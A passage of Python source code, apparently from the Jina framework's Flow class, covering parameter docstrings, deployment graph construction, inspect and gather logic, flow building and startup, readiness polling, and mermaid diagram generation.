* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect deployments in the flow.
If `REMOVE` is given then all inspect deployments are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._deployment_nodes = OrderedDict() # type: Dict[str, Deployment]
self._inspect_deployments = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_deployment = [
GATEWAY_NAME
] #: default first deployment is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.helper import ArgNamespace
from jina.parsers.flow import set_flow_parser
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(
op_flow, deployment_name, endpoint, connect_to_last_deployment=False
) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_deployment and connect_to_last_deployment:
endpoint = [op_flow.last_deployment]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == deployment_name:
raise FlowTopologyError(
'the income/output of a deployment can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Deployment
endpoint = set(op_flow._inspect_deployments.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_deployment(self):
"""Last deployment
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_deployment[-1]
@last_deployment.setter
def last_deployment(self, name: str):
"""
Set a Deployment as the last Deployment in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Deployment
"""
if name not in self._deployment_nodes:
raise FlowMissingDeploymentError(f'{name} can not be found in this Flow')
if self._last_changed_deployment and name == self.last_deployment:
pass
else:
self._last_changed_deployment.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
deployments_addresses: Dict[str, List[str]],
graph_conditions: Dict[str, Dict],
deployments_disabled_reduce: List[str],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port=self.port,
deployment_role=DeploymentRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
env=self.env,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
# We need to check later if the port was manually set or randomly
args.default_port = (
kwargs.get('port', None) is None and kwargs.get('port_expose', None) is None
)
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.graph_conditions = json.dumps(graph_conditions)
args.deployments_addresses = json.dumps(deployments_addresses)
args.deployments_disable_reduce = json.dumps(deployments_disabled_reduce)
self._deployment_nodes[GATEWAY_NAME] = Deployment(args, needs)
def _get_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.head_args:
# add head information
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port}']
else:
# there is no head, add the worker connection information instead
host = v.host
if host_is_local(host) and in_docker() and v.dockerized_uses:
host = __docker_host__
graph_dict[node] = [f'{v.protocol}://{host}:{port}' for port in v.ports]
return graph_dict
def _get_k8s_deployments_addresses(
self, k8s_namespace: str
) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.helper import to_compatible_name
from jina.serve.networking import GrpcConnectionPool
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_k8s_address = f'{v.host}'
elif v.head_args:
deployment_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
else:
deployment_k8s_address = (
f'{to_compatible_name(v.name)}.{k8s_namespace}.svc'
)
external_port = v.head_port if v.head_port else v.port
graph_dict[node] = [
f'{v.protocol}://{deployment_k8s_address}:{external_port if v.external else GrpcConnectionPool.K8S_PORT}'
]
return graph_dict if graph_dict else None
def _get_docker_compose_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.docker_compose import port
from jina.orchestrate.deployments.config.helper import to_compatible_name
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_docker_compose_address = [
f'{v.protocol}://{v.host}:{v.port}'
]
elif v.head_args:
deployment_docker_compose_address = [
f'{to_compatible_name(v.head_args.name)}:{port}'
]
else:
if v.args.replicas == 1:
deployment_docker_compose_address = [
f'{to_compatible_name(v.name)}:{port}'
]
else:
deployment_docker_compose_address = []
for rep_id in range(v.args.replicas):
node_name = f'{v.name}/rep-{rep_id}'
deployment_docker_compose_address.append(
f'{to_compatible_name(node_name)}:{port}'
)
graph_dict[node] = deployment_docker_compose_address
return graph_dict
def _get_graph_conditions(self) -> Dict[str, Dict]:
graph_condition = {}
for node, v in self._deployment_nodes.items():
if v.args.when is not None: # condition on input docs
graph_condition[node] = v.args.when
return graph_condition
def _get_disabled_reduce_deployments(self) -> List[str]:
disabled_deployments = []
for node, v in self._deployment_nodes.items():
if v.args.disable_reduce:
disabled_deployments.append(node)
return disabled_deployments
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same deployment
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._deployment_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_deployment = self.last_deployment
if last_deployment != 'gateway':
graph_dict[last_deployment].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all pods defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN,
*args,
**kwargs,
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Deployments so far and add a blocker to the Flow; wait until all handing pods completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_deployments(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_deployment
@overload
def add(
self,
*,
compression: Optional[str] = 'NoCompression',
connection_list: Optional[str] = None,
disable_auto_volume: Optional[bool] = False,
disable_reduce: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
monitoring: Optional[bool] = False,
name: Optional[str] = None,
native: Optional[bool] = False,
output_array_type: Optional[str] = None,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_monitoring: Optional[int] = 9090,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
timeout_send: Optional[int] = None,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
when: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param compression: The compression mechanism used when sending requests from the Head to the WorkerRuntimes. Possibilities are `NoCompression, Gzip, Deflate`. For more details, check https://grpc.github.io/grpc/python/grpc.html#compression.
:param connection_list: dictionary JSON with a list of connections to configure
:param disable_auto_volume: Do not automatically mount a volume for dockerized Executors.
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param external: The Deployment will be considered an external Deployment that has been started independently from the Flow.This Deployment will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param monitoring: If set, spawn an http server with a prometheus endpoint to expose metrics
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param output_array_type: The type of array `tensor` and `embedding` will be serialized to.
Supports the same types as `docarray.to_protobuf(.., ndarray_type=...)`, which can be found
`here <https://docarray.jina.ai/fundamentals/document/serialization/#from-to-protobuf>`.
Defaults to retaining whatever type is returned by the Executor.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_monitoring: The port on which the prometheus server is exposed, default port is 9090
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the deployment
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param timeout_send: The timeout in milliseconds used when sending data requests to Executors, -1 means no timeout, disabled by default
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Deployment has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Pods described by --uses, typically used for receiving from all shards, accepted type follows `--uses`. This argument only applies for sharded Deployments (shards > 1).
:param uses_after_address: The address of the uses-before runtime
:param uses_before: The executor attached before the Pods described by --uses, typically before sending to all shards, accepted type follows `--uses`. This argument only applies for sharded Deployments (shards > 1).
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param when: The condition that the documents need to fulfill before reaching the Executor.The condition can be defined in the form of a `DocArray query condition <https://docarray.jina.ai/fundamentals/documentarray/find/#query-by-conditions>`
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_deployment
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
deployment_role: 'DeploymentRoleType' = DeploymentRoleType.DEPLOYMENT,
**kwargs,
) -> 'Flow':
"""
Add a Deployment to the current Flow object and return the new modified Flow object.
The attribute of the Deployment can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Deployment(s) that this Deployment receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param deployment_role: the role of the Deployment, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Deployment CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# deployment naming logic
deployment_name = kwargs.get('name', None)
if deployment_name in op_flow._deployment_nodes:
new_name = f'{deployment_name}{len(op_flow._deployment_nodes)}'
self.logger.debug(
f'"{deployment_name}" is used in this Flow already! renamed it to "{new_name}"'
)
deployment_name = new_name
if not deployment_name:
deployment_name = f'executor{len(op_flow._deployment_nodes)}'
if not deployment_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {deployment_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, deployment_name, needs, connect_to_last_deployment=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
# do not inherit the port argument from the flow
if key not in kwargs and key != 'port':
kwargs[key] = value
# update kwargs of this Deployment
kwargs.update(
dict(
name=deployment_name,
deployment_role=deployment_role,
)
)
parser = set_deployment_parser()
if deployment_role == DeploymentRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# deployment workspace if not set then derive from flow workspace
if args.workspace:
args.workspace = os.path.abspath(args.workspace)
else:
args.workspace = self.workspace
args.noblock_on_start = True
port = kwargs.get('port', None)
if not port:
port = helper.random_port()
args.port = port
if len(needs) > 1 and args.external and args.disable_reduce:
raise ValueError(
'External Executors with multiple needs have to do auto reduce.'
)
op_flow._deployment_nodes[deployment_name] = Deployment(args, needs)
op_flow.last_deployment = deployment_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Deployment in the Flow
Internally, it adds two Deployments to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BaseDeployment(_pass) -- Flow
|
-- PUB-SUB -- InspectDeployment (Hanging)
In this way, :class:`InspectDeployment` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Deployment
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_deployment = self.last_deployment
op_flow = self.add(
name=name,
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT,
*args,
**kwargs,
)
# now remove uses and add an auxiliary Deployment
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_deployment by the auxiliary Deployment
op_flow._inspect_deployments[_last_deployment] = op_flow.last_deployment
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_deployment: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Deployments output into one Deployment. When the Flow has no inspect Deployment then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Deployment
:param include_last_deployment: if to include the last modified Deployment in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [
k
for k, v in self._deployment_nodes.items()
if v.role == DeploymentRoleType.INSPECT
]
if needs:
if include_last_deployment:
needs.append(self.last_deployment)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_deployment = self._deployment_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_deployment.head_host,
'port': gateway_deployment.head_port,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._deployment_nodes:
op_flow._add_gateway(
needs={op_flow.last_deployment},
graph_description=op_flow._get_graph_representation(),
deployments_addresses=op_flow._get_deployments_addresses(),
graph_conditions=op_flow._get_graph_conditions(),
deployments_disabled_reduce=op_flow._get_disabled_reduce_deployments(),
)
removed_deployments = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_deployment_nodes = OrderedDict()
for k, v in op_flow._deployment_nodes.items():
if not v.role.is_inspect:
filtered_deployment_nodes[k] = v
else:
removed_deployments.append(v.name)
op_flow._deployment_nodes = filtered_deployment_nodes
reverse_inspect_map = {
v: k for k, v in op_flow._inspect_deployments.items()
}
while (
len(op_flow._last_changed_deployment) > 0
and len(removed_deployments) > 0
and op_flow.last_deployment in removed_deployments
):
op_flow._last_changed_deployment.pop()
for end, deployment in op_flow._deployment_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Deployment
# but not those inspect related node
if op_flow.args.inspect.is_keep:
deployment.needs = set(
ep
if deployment.role.is_inspect
else op_flow._inspect_deployments.get(ep, ep)
for ep in deployment.needs
)
else:
deployment.needs = set(
reverse_inspect_map.get(ep, ep) for ep in deployment.needs
)
hanging_deployments = _hanging_deployments(op_flow)
if hanging_deployments:
op_flow.logger.warning(
f'{hanging_deployments} are hanging in this flow with no deployment receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_deployments) > 0:
# very dirty
op_flow._deployment_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._deployment_nodes[
GATEWAY_NAME
].args.deployments_addresses = json.dumps(
op_flow._get_deployments_addresses()
)
op_flow._deployment_nodes[GATEWAY_NAME].update_pod_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._deployment_nodes:
self._deployment_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Deployments in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.orchestrate.pods.Pod`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
port_gateway = self._deployment_nodes[GATEWAY_NAME].args.port
if not (
is_port_free(__default_host__, port_gateway)
): # we check if the port is not used at parsing time as well for robustness
raise PortAlreadyUsed(f'port:{port_gateway}')
# set env only before the Deployment get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_deployment_name, _deployment):
try:
if not _deployment.external:
results[_deployment_name] = 'pending'
_deployment.wait_start_success()
results[_deployment_name] = 'done'
except Exception as ex:
results[_deployment_name] = repr(ex)
def _polling_status(status):
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
pending_str = colored_rich(' '.join(pendings)[:50], 'yellow')
status.update(
f'{num_done}/{num_all} waiting {pending_str} to be ready...'
)
if not pendings:
break
time.sleep(0.1)
# kick off all deployments wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
console = get_rich_console()
with console.status('Working...') as status:
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, args=[status], daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = self._init_table()
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_deployments = [k for k, v in results.items() if v != 'done']
if error_deployments:
self.logger.error(
f'Flow is aborted due to {error_deployments} can not be started.'
)
self.close()
raise RuntimeFailToStart
if addr_table:
print(
Panel(
addr_table,
title=':tada: [b]Flow is ready to serve![/]',
expand=False,
)
) # can't use logger here see : https://github.com/Textualize/rich/discussions/2024
self.logger.debug(
f'{self.num_deployments} Deployments (i.e. {self.num_pods} Pods) are running in this Flow'
)
@property
def num_deployments(self) -> int:
"""Get the number of Deployments in this Flow
.. # noqa: DAR201"""
return len(self._deployment_nodes)
@property
def num_pods(self) -> int:
"""Get the number of pods (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_pods for v in self._deployment_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._deployment_nodes == b._deployment_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
deployment_nodes = []
# plot subgraphs
for node, v in self._deployment_nodes.items():
deployment_nodes.append(v.name)
deployment_mermaid = v._mermaid_str
mermaid_graph.extend(deployment_mermaid)
for node, v in self._deployment_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._deployment_nodes[need].role
_e_role = self._deployment_nodes[node].role
if self._deployment_nodes[need].external:
_s_role = 'EXTERNAL'
if self._deployment_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if (
_s_role == DeploymentRoleType.INSPECT
or _e_role == DeploymentRoleType.INSPECT
):
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.JOIN_INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
